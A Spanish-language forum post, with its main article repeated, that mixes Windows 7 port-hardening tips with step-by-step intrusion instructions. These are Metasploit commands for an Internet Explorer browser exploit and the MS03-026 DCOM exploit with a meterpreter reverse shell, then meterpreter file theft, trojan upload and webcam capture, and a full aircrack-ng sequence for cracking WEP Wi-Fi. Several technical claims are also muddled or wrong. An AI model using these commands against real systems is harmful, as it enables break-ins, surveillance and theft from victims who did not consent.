nasdaq10
Usuario (Argentina)
Ante todo, para asegurarse que no pueda nadie acceder a nuestro ordenador o nuestra red, recomiendo no usar router inalámbrico, ya que todos los sistemas de seguridad inalámbricos, ya sea wep, wpa, wpa2 y servidor radius son vulnerables; y mediante metasploit y dns spoofing se podría acceder a un Windows 7 u 8; o mediante un filtro programado en lenguaje C, de los muy conocidos sniffers, se podría inyectar un troyano o exploit, y acceder también. Hay muchas técnicas, pero yo propongo acá las más triviales. En el caso de usar router inalámbrico, usar encriptación wpa2 y filtro mac, para que solo los ordenadores permitidos puedan acceder a la red, aunque la mac puede spoofearse (falsificarse) y acceder también, de forma muy sencilla. Hoy día todos conocemos el sistema automático para hackear cualquier tipo de red inalambrica; sistemas como el “wifislax” son excelentes. Recomiendo usar siempre el ultimo sistema operativo del mercado, en la actualidad Windows 8, aunque Windows 7 si se lo tiene con todas las actualizaciones puede ser seguro. No usar Windows xp, ya que es vulnerable en todo sus ámbitos, menos aun Windows 98, etc. Activar el firewall de Windows, e utilizar un firewall que proteja la navegación, aquellos toolbar. Obviamente para el que sabe, usar Linux. Y el que se quiere esconder del FBI y de la NSA, no usar navegadores como yahoo y google, ya que todos esos son controlados y obviamente al acceder al buscador google o yahoo, ya se menten en tu maquina. Bien, ahora comencemos. Si se ejecuta el comando netstat -a se podrá comprobar que, aunque tengamos firewall, veremos puertos comprometedores abiertos bajo Windows 7 (estado listening). Puertos como 135, 139 y 445 están siempre abiertos por defecto, y ningún firewall los cierra. Por eso, es importante deshabilitar netbiot bajo tcp/ip para cerrar el puerto 139, yendo a panel de control - centro de redes y recursos compartidos - cambiar configuracion del adaptador - propiedades - protocolo de internet versión 4 -propiedades - opciones avanzadas - wins - deshabilitar netbios a través de tcp/ip. Para cerrar el puerto 135 (dcom) se usa un programa como dcombobulator. Para cerrar el puerto 445, se deshabilita servidor, en servicios de Windows (panel de control - herramientas administrativas - servicios, y seleccionar servidor de la lista y deshabilitarlo). De esta forma, se podrán cerrar estos puertos que son tan vulnerables a ciertos exploits. Los puertos 2869 y 10243, se cierran deshabilitando en servicios de Windows, dispositivo host de upnp. Para cerrar el puerto 5800 depende del programa que tengas instalado que abra ese puerto. Por ejemplo, si tenés instalado, geek, deberías ir a servicios de Windows, y deshabilitar geekbuddy remote screen protocol. Si querés cerrar el puerto 5357, se debe deshabilitar en servicios de Windows, publicación de recurso de detección de función. Luego de todo esto, no olvidar reiniciar la pc para que queden los cambios, y al probar luego con el comando netstat -a se va a comprobar que desaparecen esos puertos del estado listening. El puerto 554, es para escuchar audio via internet, por lo que es necesario para el uso cotidiano. Aunque se puede cerrar también desde servicios de windows, deshabilitando servicio de uso compartido de red del reproductor de Windows media, y en caso necesario, Windows 7 abrirá automáticamente otro puerto para audio. Por ultimo, acá dejo el listado de los procesos de los puertos restantes que están abiertos por defecto en Windows 7. Tcp 49152 listening wininit.exe Tcp 49153 listening svchost.exe Tcp 49154 listening svchost.exe Tcp 49155 listening services.exe Tcp 49156 listening lsass.exe Bueno, haciendo todo esto, igual pueden meterse en tu maquina, y si estas en una corporativa de red cableada, ya habrás visto películas que te muestran como un hacker conecta su notebook al CORE para acceder a la red, y luego jugar un poco con algún sniffer y con metasploit acceder. Cambiando de tema, dando un ejemplo: supongamos que la empresa clarín quiera ingresar a nuestra pc cada vez que ingresamos a su sitio. Solo debe hacer lo siguiente bajo metasploit en Kali Linux #use windows/browser/ms11_003_ie_css_import #srvhost clarin.com #srvport 80 #uripath / #exploit (acá clarin lanza el exploit) Luego una victima visita www.clarin.com Entonces el hacker de clarin escribe comando para penetrar a la pc victima. #sessions -i 1 Luego bajo meterpreter obtiene shell y hace lo quiere, incluso mirar por la camara de la pc victima; mediante el comando webcam_snap Para evitar eso, usar por ejemplo; avg toolbar, que te protege la navegación por internet bastante bien de forma gratuita, aunque con conexión inversa se puede penetrar igual. Por eso, aclaro... Tener mucho cuidado que paginas visitamos, porque al visitar un sitio, le damos la posibilidad para que ese servidor ingrese a nuestra pc, aun teniendo Windows 7, 8 e incluso Windows server 2008, 2012, etc. Aclaración: muchos de estos puertos no se deben cerrar si se trabaja en red. En caso de ser cerrados, simplemente volver a habilitarlos desde servicios de Windows nuevamente... Y como dije antes, para ir a servicios de Windows: panel de control - herramientas administrativas - servicios. Dando una pista con fines educativos: Una forma muy sencilla para ingresar, por ejemplo, a una pc que trabaja bajo Windows xp que, tenga el puerto 135 abierto (dcom). Aclaro; todos los Windows xp tienen abierto ese puerto por defecto, incluso que se tenga instalado un firewall. Bueno se quema en un dvd el sistema Kali Linux, y luego bajo una terminal escribir los siguientes comandos. Msfconsole (con este comando se accede a la consola de metasploit) Use exploit/windows/dcerpc/ms03_026_dcom (comando para indicar el exploit a utilizar) Set payload windows/meterpreter/reverse_tcp (comando para indicar el tipo de ataque) Set lhost iplocal (en “iplocal” se escribe la ip local. O sea tu ip) Set rhost ipremota (en “ipremota” se escribe la ip de la pc victima) Set rport 135 (este es el puerto por el que se va a ingresar. O sea 135) Exploit (con este comando se lanza el exploit a la pc victima) Listo!!! Ya se está en la pc victima. Ahora solo queda usar los comandos respectivos para hacer lo que uno quiera bajo meterpreter. Por ejemplo, si se escribe get shell, se obtiene shell. Luego se navega por el disco con los típicos comandos de msdos. Para descargar un archivo se usa el comando download (nombre de archivo), y para subir un archivo, por ejemplo, un supuesto troyano, upload (nombre de archivo). También se puede tener el control de la webcam como dije anteriormente. En fin, solo les queda ver una guía sobre los comandos posibles bajo meterpreter. Por ultimo, quería comentar que existe un modo gráfico, que es el “ARMITAGE” que, da un abanico de posibilidades de forma rápida y automatizada. Para vulnerar los correos, ya sea hotmail como gmail, facebook y twitter; se usa bajo Kali Linux la herramienta set (social engineer toolkit ); aunque si se está dentro de la red, con un sniffer y envenenamiento arp se obtiene también. Claro, existe también envenenamiento dns, arp spoofing, dhcp spoofing, etc... Recomiendo aprender las ultimas vulnerabilidades con el buscador "SHODAN". Ahí se pueden ver los últimos exploits de metasploit con toda una explicación exhaustiva. Por ejemplo, recomendable no instalar el adobe flash player, el vlc, el java, el quick time, el explorer 9.0 y anteriores en el ordenador, etc., ya que existen exploits que vulneran estos programas, aun bajo Windows 7 u 8; lo mismo con los Windows Server. En este buscador se pueden ver los últimos exploits para Mac os x, Linux, Unix y Windows. Ya que estamos en el baile, comento que existen sistemas automatizados para el hackeo de sitios web. Sistemas como "samurai web testing framework" son muy poderosos. Acá dejo el enlace para los interesados: Claro está, que existen otros, pero es bueno conocer estos sistemas si se tiene un sitio web, para prevenir de ataques. De hecho, el ejercito de los EE.UU, ya sea la fuerza aerea, naval y terrestre utiliza el mismísimo Internet, solo que cada ordenador se conecta a un dispositivo de encriptación llamado "TACLANE", mediante un conector rs232 (db9 a db9), conector igual al de las impresoras fiscales que todos conocemos. Obviamente de ahí, un cable utp con conector rj45 al router, y de ahí, la salida a internet. La información es recibida y decodificada por otro dispositivo "TACLANE" destino, hasta llegar finalmente al ordenador receptor. Obviamente dependiendo el tipo de red, se usará conversor, pdh o sdh, y los odf que todos conocemos en fibra óptica, pasando por los concentradores hasta llegar hasta los proveedores de telecomunicación como Telecom, Telefonica, etc., por nombrar algunos conocidos en Latinoamérica. Todo esto es muy largo, y solo trato de dar una pista para los desorientados en este mundo de las telecomunicaciones. Este artículo es de total autoría mía; he utilizado términos como ordenador en lugar de computador, para que sea legible para todo hispano parlante. Todo los derechos de autor ©. No me hago responsable del mal uso de está información; ya que el presente texto es solo con fines educativos.... PUEDEN VISITAR MI SITIO:
SOLO CON FINES EDUCATIVOS Primero descargar el sistema BACK TRACK 5 R3 de internet. Luego grabarlo en un CD, y booter la computadora desde ahí. NO HACE FALTA INSTALARLO. HAY QUE TENER TARJETA DE RED INALAMBRICA INSTALADA EN LA COMPUTADORA. Una vez, arrancado el sistema BACK TRACK, entrar a modo grafico con el siguiente comando: #startx Ahora ir a una consola y escribir los siguientes comandos: #airmon-ng #airmon-ng start wlan0 #airmon-ng #airodump-ng mon0 (se empiezan a ver las redes que hay. se elige la que se quiere hackear) Ahora teclar al mismo tiempo ctrl + c para frenar proceso LUEGO SE ESCRIBE LO SIGUIENTE: #airodump-ng -w wep -c ( se escribe numero de canal) --bssid (se escribe numero de mac) mon0 Ahora, abrir una segunda ventana y escribir lo siguiente en la consola: #aireplay-ng -1 0 -a (escribir numero de mac) mon0 Abrir una tercera ventana y escribir lo siguiente en la consola: #aireplay-ng -3 -b (escribir numero de mac) mon0 [(hay que esperar que “data” de la primera pantalla de la consola llegue por lo menos a 100000. Esto puede tardar o no, al principio va lento, depende de la distancia que esta de la red para aumentar el acceso. si esta a 30 metros en 10 minutos se puede decifrar, si se tiene una buena tarjeta de red inalambrica) Escribir el comando dir para ver el nombre completo del archivo .cap que se creo #dir Ahora escribir el nombre del archivo cap #aircrack-ng archivo.cap (este es el exploit que descifrá la clave) Listo!!! Sistema inalámbrico WEP vulnerado… PARA NO SER VULNERADO, NO USAR ENCRIPTACION WEP..... PUEDEN VISITAR MI SITIO: www.tejnion.blogspot.com
Ante todo, para asegurarse que no pueda nadie acceder a nuestro ordenador o nuestra red, recomiendo no usar router inalámbrico, ya que todos los sistemas de seguridad inalámbricos, ya sea wep, wpa, wpa2 y servidor radius son vulnerables; y mediante metasploit y dns spoofing se podría acceder a un Windows 7 u 8; o mediante un filtro programado en lenguaje C, de los muy conocidos sniffers, se podría inyectar un troyano o exploit, y acceder también. Hay muchas técnicas, pero yo propongo acá las más triviales. En el caso de usar router inalámbrico, usar encriptación wpa2 y filtro mac, para que solo los ordenadores permitidos puedan acceder a la red, aunque la mac puede spoofearse (falsificarse) y acceder también, de forma muy sencilla. Hoy día todos conocemos el sistema automático para hackear cualquier tipo de red inalambrica; sistemas como el “wifislax” son excelentes. Recomiendo usar siempre el ultimo sistema operativo del mercado, en la actualidad Windows 8, aunque Windows 7 si se lo tiene con todas las actualizaciones puede ser seguro. No usar Windows xp, ya que es vulnerable en todo sus ámbitos, menos aun Windows 98, etc. Activar el firewall de Windows, e utilizar un firewall que proteja la navegación, aquellos toolbar. Obviamente para el que sabe, usar Linux. Y el que se quiere esconder del FBI y de la NSA, no usar navegadores como yahoo y google, ya que todos esos son controlados y obviamente al acceder al buscador google o yahoo, ya se menten en tu maquina. Bien, ahora comencemos. Si se ejecuta el comando netstat -a se podrá comprobar que, aunque tengamos firewall, veremos puertos comprometedores abiertos bajo Windows 7 (estado listening). Puertos como 135, 139 y 445 están siempre abiertos por defecto, y ningún firewall los cierra. Por eso, es importante deshabilitar netbiot bajo tcp/ip para cerrar el puerto 139, yendo a panel de control - centro de redes y recursos compartidos - cambiar configuracion del adaptador - propiedades - protocolo de internet versión 4 -propiedades - opciones avanzadas - wins - deshabilitar netbios a través de tcp/ip. Para cerrar el puerto 135 (dcom) se usa un programa como dcombobulator. Para cerrar el puerto 445, se deshabilita servidor, en servicios de Windows (panel de control - herramientas administrativas - servicios, y seleccionar servidor de la lista y deshabilitarlo). De esta forma, se podrán cerrar estos puertos que son tan vulnerables a ciertos exploits. Los puertos 2869 y 10243, se cierran deshabilitando en servicios de Windows, dispositivo host de upnp. Para cerrar el puerto 5800 depende del programa que tengas instalado que abra ese puerto. Por ejemplo, si tenés instalado, geek, deberías ir a servicios de Windows, y deshabilitar geekbuddy remote screen protocol. Si querés cerrar el puerto 5357, se debe deshabilitar en servicios de Windows, publicación de recurso de detección de función. Luego de todo esto, no olvidar reiniciar la pc para que queden los cambios, y al probar luego con el comando netstat -a se va a comprobar que desaparecen esos puertos del estado listening. El puerto 554, es para escuchar audio via internet, por lo que es necesario para el uso cotidiano. Aunque se puede cerrar también desde servicios de windows, deshabilitando servicio de uso compartido de red del reproductor de Windows media, y en caso necesario, Windows 7 abrirá automáticamente otro puerto para audio. Por ultimo, acá dejo el listado de los procesos de los puertos restantes que están abiertos por defecto en Windows 7. Tcp 49152 listening wininit.exe Tcp 49153 listening svchost.exe Tcp 49154 listening svchost.exe Tcp 49155 listening services.exe Tcp 49156 listening lsass.exe Bueno, haciendo todo esto, igual pueden meterse en tu maquina, y si estas en una corporativa de red cableada, ya habrás visto películas que te muestran como un hacker conecta su notebook al CORE para acceder a la red, y luego jugar un poco con algún sniffer y con metasploit acceder. Cambiando de tema, dando un ejemplo: supongamos que la empresa clarín quiera ingresar a nuestra pc cada vez que ingresamos a su sitio. Solo debe hacer lo siguiente bajo metasploit en Kali Linux #use windows/browser/ms11_003_ie_css_import #srvhost clarin.com #srvport 80 #uripath / #exploit (acá clarin lanza el exploit) Luego una victima visita www.clarin.com Entonces el hacker de clarin escribe comando para penetrar a la pc victima. #sessions -i 1 Luego bajo meterpreter obtiene shell y hace lo quiere, incluso mirar por la camara de la pc victima; mediante el comando webcam_snap Para evitar eso, usar por ejemplo; avg toolbar, que te protege la navegación por internet bastante bien de forma gratuita, aunque con conexión inversa se puede penetrar igual. Por eso, aclaro... Tener mucho cuidado que paginas visitamos, porque al visitar un sitio, le damos la posibilidad para que ese servidor ingrese a nuestra pc, aun teniendo Windows 7, 8 e incluso Windows server 2008, 2012, etc. Aclaración: muchos de estos puertos no se deben cerrar si se trabaja en red. En caso de ser cerrados, simplemente volver a habilitarlos desde servicios de Windows nuevamente... Y como dije antes, para ir a servicios de Windows: panel de control - herramientas administrativas - servicios. Dando una pista con fines educativos: Una forma muy sencilla para ingresar, por ejemplo, a una pc que trabaja bajo Windows xp que, tenga el puerto 135 abierto (dcom). Aclaro; todos los Windows xp tienen abierto ese puerto por defecto, incluso que se tenga instalado un firewall. Bueno se quema en un dvd el sistema Kali Linux, y luego bajo una terminal escribir los siguientes comandos. Msfconsole (con este comando se accede a la consola de metasploit) Use exploit/windows/dcerpc/ms03_026_dcom (comando para indicar el exploit a utilizar) Set payload windows/meterpreter/reverse_tcp (comando para indicar el tipo de ataque) Set lhost iplocal (en “iplocal” se escribe la ip local. O sea tu ip) Set rhost ipremota (en “ipremota” se escribe la ip de la pc victima) Set rport 135 (este es el puerto por el que se va a ingresar. O sea 135) Exploit (con este comando se lanza el exploit a la pc victima) Listo!!! Ya se está en la pc victima. Ahora solo queda usar los comandos respectivos para hacer lo que uno quiera bajo meterpreter. Por ejemplo, si se escribe get shell, se obtiene shell. Luego se navega por el disco con los típicos comandos de msdos. Para descargar un archivo se usa el comando download (nombre de archivo), y para subir un archivo, por ejemplo, un supuesto troyano, upload (nombre de archivo). También se puede tener el control de la webcam como dije anteriormente. En fin, solo les queda ver una guía sobre los comandos posibles bajo meterpreter. Por ultimo, quería comentar que existe un modo gráfico, que es el “ARMITAGE” que, da un abanico de posibilidades de forma rápida y automatizada. Para vulnerar los correos, ya sea hotmail como gmail, facebook y twitter; se usa bajo Kali Linux la herramienta set (social engineer toolkit ); aunque si se está dentro de la red, con un sniffer y envenenamiento arp se obtiene también. Claro, existe también envenenamiento dns, arp spoofing, dhcp spoofing, etc... Recomiendo aprender las ultimas vulnerabilidades con el buscador "SHODAN". Ahí se pueden ver los últimos exploits de metasploit con toda una explicación exhaustiva. Por ejemplo, recomendable no instalar el adobe flash player, el vlc, el java, el quick time, el explorer 9.0 y anteriores en el ordenador, etc., ya que existen exploits que vulneran estos programas, aun bajo Windows 7 u 8; lo mismo con los Windows Server. En este buscador se pueden ver los últimos exploits para Mac os x, Linux, Unix y Windows. Ya que estamos en el baile, comento que existen sistemas automatizados para el hackeo de sitios web. Sistemas como "samurai web testing framework" son muy poderosos. Acá dejo el enlace para los interesados: http://samurai.inguardians.com/ Claro está, que existen otros, pero es bueno conocer estos sistemas si se tiene un sitio web, para prevenir de ataques. De hecho, el ejercito de los EE.UU, ya sea la fuerza aerea, naval y terrestre utiliza el mismísimo Internet, solo que cada ordenador se conecta a un dispositivo de encriptación llamado "TACLANE", mediante un conector rs232 (db9 a db9), conector igual al de las impresoras fiscales que todos conocemos. Obviamente de ahí, un cable utp con conector rj45 al router, y de ahí, la salida a internet. La información es recibida y decodificada por otro dispositivo "TACLANE" destino, hasta llegar finalmente al ordenador receptor. Obviamente dependiendo el tipo de red, se usará conversor, pdh o sdh, y los odf que todos conocemos en fibra óptica, pasando por los concentradores hasta llegar hasta los proveedores de telecomunicación como Telecom, Telefonica, etc., por nombrar algunos conocidos en Latinoamérica. Todo esto es muy largo, y solo trato de dar una pista para los desorientados en este mundo de las telecomunicaciones. Este artículo es de total autoría mía; he utilizado términos como ordenador en lugar de computador, para que sea legible para todo hispano parlante. Todo los derechos de autor ©. No me hago responsable del mal uso de está información; ya que el presente texto es solo con fines educativos.... PUEDEN VISITAR MI SITIO: HTTP://WWW.TEJNION.BLOGSPOT.COM